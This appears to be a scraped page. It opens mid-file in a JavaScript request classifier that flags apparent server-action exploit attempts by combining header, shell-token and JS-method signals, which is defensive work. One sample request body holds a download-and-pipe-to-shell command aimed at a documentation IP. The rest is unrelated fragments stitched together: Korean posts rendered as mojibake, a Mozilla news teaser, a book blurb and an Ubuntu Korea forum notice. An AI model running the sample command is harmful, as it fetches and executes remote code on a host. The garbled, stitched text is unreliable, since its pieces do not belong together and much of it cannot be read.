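  for (const [k, v] of Object.entries(req.headers || {})) headers[k.toLowerCase()] = v;
  const body = typeof req.body === 'string' ? req.body : JSON.stringify(req.body || '');
  const signals = {
    nextAction: Object.prototype.hasOwnProperty.call(headers, 'next-action'), // signal 1
    osCommand: OS_COMMAND_TOKENS.some((re) => re.test(body)),
    jsMethod: JS_METHOD_TOKENS.some((re) => re.test(body)),
  };
  const score = Object.values(signals).filter(Boolean).length;
  // All three together is the rare combination the rule targets; two is worth
  // logging for review; one is everyday traffic.
  const action = score === 3 ? 'block' : score === 2 ? 'log' : 'allow';
  return { signals, score, action };
}

// Constructed sample requests. 203.0.113.0/24 is a documentation range.
const SAMPLE_REQUESTS = [
  { name: 'normal server action',
    headers: { 'Next-Action': 'a1b2c3', 'Content-Type': 'text/plain' },
    body: '["Hello from the form"]' },
  { name: 'code snippet posted to a forum',
    headers: { 'Content-Type': 'application/json' },
    body: '{"text":"const merged = Object.assign({}, a, b);"}' },
  { name: 'action plus shell-looking text',
    headers: { 'Next-Action': 'a1b2c3' },
    body: '["run: curl https://docs.example.invalid"]' },
  { name: 'all three signals at once',
    headers: { 'next-action': 'zz' },
    body: '{"note":"busybox wget http://203.0.113.5/x -O-|sh","fn":"Object.assign"}' },
];

function classifyAll() {
  return SAMPLE_REQUESTS.map((r) => ({ name: r.name, ...classifyRequest(r) }));
}

for (const r of classifyAll()) console.log(`${r.action.padEnd(5)} score=${r.score}  ${r.name}`);
```

Header matching is case-insensitive because HTTP header names are, and the body is inspected as text so the rule works whether the action payload arrives as JSON, a JSON string, or multipart form data. A rule like this is a stopgap that buys time for the version update; it does not replace it.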


๋ฐฐํƒˆ๋‚˜์„œ ๋‚ด๊ณผ๋ณ‘์› ๊ฐ
์˜์‚ฌ: ์•ฝ ๋“œ์‹œ๊ณ ์š”, ์ „ํ•ด์งˆ ์„ญ์ทจ๊ฐ€ ์ค‘์š”ํ•˜๋‹ˆ ์ด์˜จ์Œ๋ฃŒ ์žˆ์ฃ ? ํฌ์นด๋ฆฌ์Šค์›จํŠธ ๊ฐ™์€๊ฑฐ. ๋งŽ์ด ๋“œ์„ธ์š”. ๊ธฐ๋ฆ„์ง„๊ฑฐ ์ฐฌ๊ฑฐ ๋งค์šด๊ฑฐ ๋“ฑ๋“ฑ ํ”ผํ•˜์‹œ๊ณ ์š”.

์•ฝ์‚ฌ: ์ด์˜จ์Œ๋ฃŒ๋Š” ๋“œ์‹œ๋Š”๋ฐ ํฌ์นด๋ฆฌ์Šค์›จํŠธ ๊ฐ™์€ ๋‹จ๊ฑฐ๋Š” ํ”ผํ•˜์„ธ์š”.

...์ €๊ธฐ ๋‘๋ถ„์ด ํ•ฉ์˜ ์ข€...


Mozillaโ€™s new CEO: Firefox will become an โ€œAI browserโ€

In recent years, things have not been going well for Mozilla. Firefox's market share is a rounding error, and financially, the company is effectively entirely dependent on free money from Google for making it the default search engine in Firefox. Mozilla's tried to stem the bleeding with deeply unpopular efforts like foc

osnews.com/story/144027/mozill


The Routledge Handbook on Biochemistry of Exercise by Peter M. Tiidus, 2020

From its early beginnings in the 1960s, the academic field of biochemistry of exercise has expanded beyond examining and describing metabolic responses to exercise and adaptations to training to include a wide understanding of molecular biology, cell signalling, interorgan communication, stem cell physiology, and a host of other cellular and biochemical mechanisms regulating acute responses and chronic adaptations related to exercise performance, human health/disease, nutrition, and cellular functioning.

taylorfrancis.com/books/edit/1

The Routledge Handbook on Biochemistry of Exercise is the first book to pull together the full depth and breadth of this subject and to update a rapidly expanding field of study with current issues and controversies and a look forward to future research directions. Bringing together many experts and leading scientists, the book emphasizes the current understanding of the underlying metabolic, cellular, genetic, and cell signalling mechanisms associated with physical activity, exercise, training, and athletic performance as they relate to, interact with, and regulate cellular and muscular adaptations and consequent effects on human health/disease, nutrition and weight control, and human performance.

With more emphasis than ever on the need to be physically active and the role that being active plays in our overall health from a whole-body level down to the cell, this book makes an important contribution for scholars, medical practitioners, nutritionists, and coaches/trainers working in research and with a wide range of clients. This text is important reading for all students, scholars, and others with an interest in health, nutrition, and exercise/training in general.

[์ƒˆ ํฌ๋Ÿผ ๊ฒŒ์‹œ๋ฌผ] ์šฐ๋ถ„ํˆฌํ•œ๊ตญ์ปค๋ฎค๋‹ˆํ‹ฐ ์ œ8๋Œ€ ๋Œ€ํ‘œ ์„ ๊ฑฐ ์—ฐ์Šต ํˆฌํ‘œ ์•ˆ๋‚ด discourse.ubuntu-kr.org/t/topi

์šฐ๋ถ„ํˆฌํ•œ๊ตญ์ปค๋ฎค๋‹ˆํ‹ฐ ์ œ8๋Œ€ ๋Œ€ํ‘œ ์„ ๊ฑฐ ์—ฐ์Šต ํˆฌํ‘œ ์•ˆ๋‚ด

์•ˆ๋…•ํ•˜์„ธ์š”, ์–ด๋А์„ธ ๋‚ด์ผ๋ถ€ํ„ฐ ํˆฌํ‘œ ๊ธฐ๊ฐ„์ด ์‹œ์ž‘๋ฉ๋‹ˆ๋‹ค. CIVS ๋ฅผ ์ฒ˜์Œ ์‚ฌ์šฉ ํ•˜์‹œ๋Š” ๋ถ„๋“ค์ด ๋งŽ์œผ์‹ค ๊ฒƒ์œผ๋กœ ๋ณด์—ฌ์„œ, ์—ฐ์Šต ํˆฌํ‘œ๋ฅผ ์ƒ์„ฑ ํ•˜์˜€์Šต๋‹ˆ๋‹ค. ์„ ๊ฑฐ๊ถŒ(ํˆฌํ‘œ๊ถŒ)์ด ์žˆ๋Š” ๋ถ„๋“ค์€ ์•„๋ž˜์™€ ๊ฐ™์€ ์ด๋ฉ”์ผ์ด ๋ฐœ์†ก ๋˜์—ˆ์œผ๋‹ˆ, ํ™•์ธ ํ•˜์…”์„œ ํˆฌํ‘œ๋ฅผ ํ•œ๋ฒˆ ์—ฐ์Šต ํ•ด ๋ณด์‹œ๋ฉด ๋˜๊ฒ ์Šต๋‹ˆ๋‹ค. ํˆฌํ‘œ ์ฐธ์—ฌ ๋ฐฉ๋ฒ•์€ ์•„๋ž˜ ๋ฌธ์„œ๋ฅผ ์ฐธ๊ณ  ํ•˜์‹œ๊ธฐ ๋ฐ”๋ž๋‹ˆ๋‹ค! ์—ฐ์Šต์šฉ ํˆฌํ‘œ๋Š” ์˜ค๋Š˜ ์ž์ • ์ดํ›„ ์ฏค ๋งˆ๊ฐ๋˜๋ฉฐ, ๋‚ด์ผ ์ค‘์œผ๋กœ ๋ณธ ํˆฌํ‘œ๊ฐ€ ์‹œ์ž‘ ๋  ์˜ˆ์ •์ž…๋‹ˆ๋‹ค. ์„ ๊ฑฐ ๊ด€๋ จ ๋ฌธ์˜์‚ฌํ•ญ์€ ์ด๋ฉ”์ผ election at ubuntu-kr.org ํ˜น์€ @sukso96100 @98sangbin @Tae @zeroday0619 ์œผ๋กœ ๋ฌธ์˜ ํ•ด ์ฃผ์„ธ์š”.

discourse.ubuntu-kr.org ยท ์šฐ๋ถ„ํˆฌํ•œ๊ตญ์ปค๋ฎค๋‹ˆํ‹ฐ ํฌ๋Ÿผ


๊ณผ์—ฐ ์ธ์Šคํƒ€์—์„œ ์—ฌ๊ธฐ๋กœ ๋ช‡ ๋ช…์ด ๋„˜์–ด์˜ฌ๊นŒ?

5๋ช…๋งŒ ๋„˜์–ด์™€๋„ ์ดˆ๋Œ€๋ฐ•์ด๋ผ๋Š” ์ƒ๊ฐ์€ ๋“œ๋Š”๋ฐ...


์ฒญ๋…„ ์•” ๊ฒฝํ—˜์ž๋“ค์€ ์ผ์ž๋ฆฌ ์ฐพ๊ธฐ๊ฐ€ ์น˜๋ฃŒ๋งŒํผ ํž˜๋“ค๋‹ค๊ณ  ํ˜ธ์†Œํ•ฉ๋‹ˆ๋‹ค. ์ด์ œ ๋ง‰ ์‚ฌํšŒ์— ์ง„์ถœํ•˜๋Š” ์ฒญ๋…„๋“ค์€ ๊ฒฝ๋ ฅ์ด ์—†๊ฑฐ๋‚˜ ์งง์•„ ๋” ๋ง‰๋ง‰ํ•ฉ๋‹ˆ๋‹ค.

โ€œ์•” ํ™˜์ž์˜€์–ด์š”? ์ฑ„์šฉ ๋ชป ํ•ฉ๋‹ˆ๋‹คโ€โ€ฆ์น˜๋ฃŒ๋งŒํผ ํž˜๋“  20...


์ด๋Ÿฐ ์• ํ•œํ…Œ ๊ทธ ์ง“๊ฑฐ๋ฆฌ๋ฅผ ํ•ด์„œ ๋ฉ€์ฉกํ•œ ๊ทธ๋ฃน ํ„ฐํŠธ๋ ค ๋จน์€ ๊ทธ ํšŒ์‚ฌ๋ฅผ ์˜์›ํžˆ ์ €์ฃผํ•˜๊ฒŒ ๋จ


ํ•ฉ์ • ํ‘ผํฌํˆผ์ด๋ผ๋Š” ์†Œํ’ˆ์ƒต์ด๋ผ๋Š” ๊ณณ์ด ์žˆ์–ด์„œ ๊ฑธ์–ด๊ฐ€๋ณด๋ ค๊ณ  ํ•ฉ๋‹ˆ๋‹ค ์ ์‹ฌ์€ ์ง€๋‚˜๊ฐ€๋‹ค ์ž๋งŒ์ถ”ํ•˜๋Š” ๊ณณ์—์„œ ๋จน์–ด์•ผ์ง€
